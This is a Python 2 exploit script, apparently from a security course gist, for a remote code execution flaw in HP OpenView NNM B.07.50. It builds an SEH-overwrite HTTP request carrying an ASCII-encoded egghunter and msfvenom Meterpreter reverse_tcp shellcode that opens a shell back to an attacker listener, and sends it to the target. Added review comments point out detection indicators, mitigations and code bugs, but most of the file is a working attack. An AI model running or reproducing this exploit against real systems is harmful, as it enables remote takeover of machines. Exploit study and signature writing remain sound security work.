HP OpenView NNM B.07.50 Remote Code Execution exploit with ASCII encoded egghunter, JO/JNO jump-over-SEH trick and stack aligned. Written during OSCE/CTP course.
#!/usr/bin/python
# HP OpenView NNM B.07.50 Remote Code Execution exploit
# by Mariusz B. / mgeeky, 17'
import struct
import socket
# Target address is a redacted placeholder left by the author; the gist does not name a real host.
HOST = '192.168.XXX.YYY'
# TCP port of the listening service; the same value is appended as ':7510' to the Host header in exploit().
PORT = 7510
def exploit(conn):
    """Assemble the malformed HTTP request described in this gist and send it on *conn*.

    Reviewer notes (reading only what the code below does):
      - *conn* must be a connected stream socket; main() passes the raw socket object.
      - The request is a GET to /topology/homeBaseView whose Host header is well over
        3 KB ('A' padding of 3377 bytes plus the staged bytes), whose User-Agent carries
        the alphanumeric payload, and whose body begins with the 8-byte tag 'T00WT00W'.
        Those three features are the observable indicators for log review and
        IDS/WAF signatures on port 7510 traffic.
      - Python 2 syntax (print statements, str used as a byte buffer); not runnable
        as-is under Python 3.
    """
    #
    # Return address in a Pop-Pop-Ret / SEH fashion to overwrite Exception handler:
    #
    # 0x6d213d2b : pop esi # pop ebp # ret
    # | asciiprint,ascii {PAGE_EXECUTE_READ} [java.dll] ASLR: False, SafeSEH: False
    #
    # NOTE(review): the chosen gadget lives in a module the author reports as lacking
    # ASLR and SafeSEH; enabling those mitigations (or DEP/SEHOP on the host) is the
    # relevant hardening for this class of overwrite.
    return_address = 0x6d213d2b
    ret = struct.pack('<I', return_address)  # little-endian DWORD placed at the handler slot
    junk = 'A' * (3381 - 4)  # 3377 bytes of filler; the 4-byte stage1 below completes the 3381-byte offset
    #
    # Stage 1: Jump over handler's address
    # 71 08 JNO short $+8
    # 70 06 JO short $+6
    stage1 = '\x71\x08\x70\x06'
    stage2 = 'G' * 32  # padding before the encoded stub
    # This is an windows 32-byte long egghunter
    # encoded with my custom ASCII encoder
    # Which can be located in this gist:
    # https://gist.github.com/mgeeky/8a118c69312b35a9db7f19f61c7a6b3c
    egghunter = r"%JMNU%521*TX-A777-i%"
    egghunter += r"%%-r2II-\ZZZP\%JMNU%"
    egghunter += r"521*-gNlN-zG1G-yQ1Q-"
    egghunter += r"1111P-cj10-v777-uX4X"
    egghunter += r"-xwxxP-NNNN-s1*z-J*r"
    egghunter += r"x-ttttP-5S%w-0n4v-nn"
    egghunter += r"nn-nnnnP-jj7j-vj%n-i"
    egghunter += r"t3y-jjjjP-d%ud-n1rf-"
    egghunter += r"7%tI-1111P-4Rfx-*5\v"
    egghunter += r"-92\y-\\\\P-p222-v2v"
    egghunter += r"v-O6wV-t%hkP"
    stage2 += egghunter
    stage2 += 'G' * 100  # trailing padding
    stage2 += ':7510'  # makes the header end like a normal "host:port" value
    exp = junk + stage1 + ret + stage2  # full Host header value
    egg = 'T00WT00W'  # 8-byte tag the hunter searches for; it prefixes the body
    shellcode = ''
    #
    # Shellcode generated using MSFVENOM - leveraging BufferRegister option since our egghunter
    # at the end takes a long jump to the value of EDI register, which is a base for the shellcode.
    #
    # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.XXX LPORT=443 \
    # BufferRegister=EDI -f raw -e x86/alpha_mixed -b '\x00\x0a\x0d'
    # Payload size: 720 bytes
    #
    # NOTE(review): LHOST is a placeholder in the comment above; the encoded bytes below
    # were generated against whatever address the author used, so the listener address
    # embedded in them is not recoverable from this file.
    shellcode += "WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0"
    shellcode += "BBABXP8ABuJI9lixk25PGps0apmY9ufQiPatNkf0"
    shellcode += "FPNkF2flNk1BEDlKT2gXFomg2ja6019oLlWLcQcL"
    shellcode += "DBtlGPJaxOvmuQKwzBYbQBSglKRr4PNkaZWLLKPL"
    shellcode += "4QSHkSSxuQkaf1Nk2yWPC1IClKg9FxjCVZbilK4t"
    shellcode += "LKEQJv5aYoLlzazotMVaYW5hKP1el6uSaml8Uk3M"
    shellcode += "5t1e9tbxNkaH5tWqN30fNkVlrkLKaHELEQKcnkWt"
    shellcode += "LK7qN0MYqTvDetCkaKcQByaJ619okP1OCo2zlK22"
    shellcode += "XknmQMBH7CGBc0C0axbWPsUbCo2tE8pLPwdf4GYo"
    shellcode += "IEh8j05QS0gp4iKtrtV0E8gYk00kuPyoZuSZc50h"
    shellcode += "YP98rDvWbHs25PC1MkniYvf0rp2pv0g0V0cpbpQx"
    shellcode += "XjTOyOM0yo9Ej7SZR0Bv67SXZ9mu0tPakOIElEIP"
    shellcode += "0tuZIobns8RU8lkXqqS0S0wprJC0PjeTv62wu8DB"
    shellcode += "n9hHQOiohUNcJX7pcNgFNkefSZaPsXwpVpwpeP2v"
    shellcode += "sZs0e8chLd2sM5KOKeNsF30jEPBvpSQG1xwr8YhH"
    shellcode += "qOIozuMSIhs03M4b1HRHWp3pgp30Qzs0pPBH4K4o"
    shellcode += "foVP9ozusgQxQe2N2mQqKOhUqNQN9ofletHibQYo"
    shellcode += "Yo9os1zcgYZf0uKwhCMkL0nUmr66PjS063IoXUAA"
    shellcode += "\xcc" * 500  # 500 bytes of 0xCC padding; a long run of this byte in a header/body is itself a detectable anomaly
    buf = 'GET /topology/homeBaseView HTTP/1.1\r\n'
    buf += 'Host: ' + exp + '\r\n'
    buf += 'Content-Type: application/x-www-form-urlencoded\r\n'
    buf += 'User-Agent: ' + shellcode + '\r\n'  # payload is sent a second time here, in a header
    buf += 'Content-Length: 1048580\r\n\r\n'  # declared length does not match the body actually sent
    buf += egg + shellcode  # body: tag followed by the payload
    print '[+] Sending HTTP packet of %d length...' % len(buf)
    print '\tHost header len: %d' % len(exp)
    # NOTE(review): this prints the whole stage2 length (padding + suffix), not only the encoded hunter.
    print '\tEgghunter len: %d' % len(stage2)
    print '\tShellcode len: %d' % len(shellcode)
    print
    print '[?] Wait about 7-15 seconds until exploit kicks in.'
    conn.send(buf)
def main():
    """Open a TCP connection to HOST:PORT, hand the socket to exploit(), then close it."""
    print '[*] HP OpenView NNM B.07.50 Remote Code Execution exploit'
    print '[*] by Mariusz B. / mgeeky, 17'
    print
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        print '[.] Connecting with %s:%d...' % (HOST, PORT)
        # socket.connect() returns None, so `conn` is never a usable object; exploit() is given `sock` below.
        conn = sock.connect((HOST, PORT))
        print '[+] Connected.'
    except:
        # Bare except: catches every exception (including KeyboardInterrupt), not only socket errors,
        # and the socket is not closed on this path.
        print '[!] Could not connect.'
        return None
    exploit(sock)
    sock.close()
# Script entry point; nothing runs on import.
if __name__ == '__main__':
    main()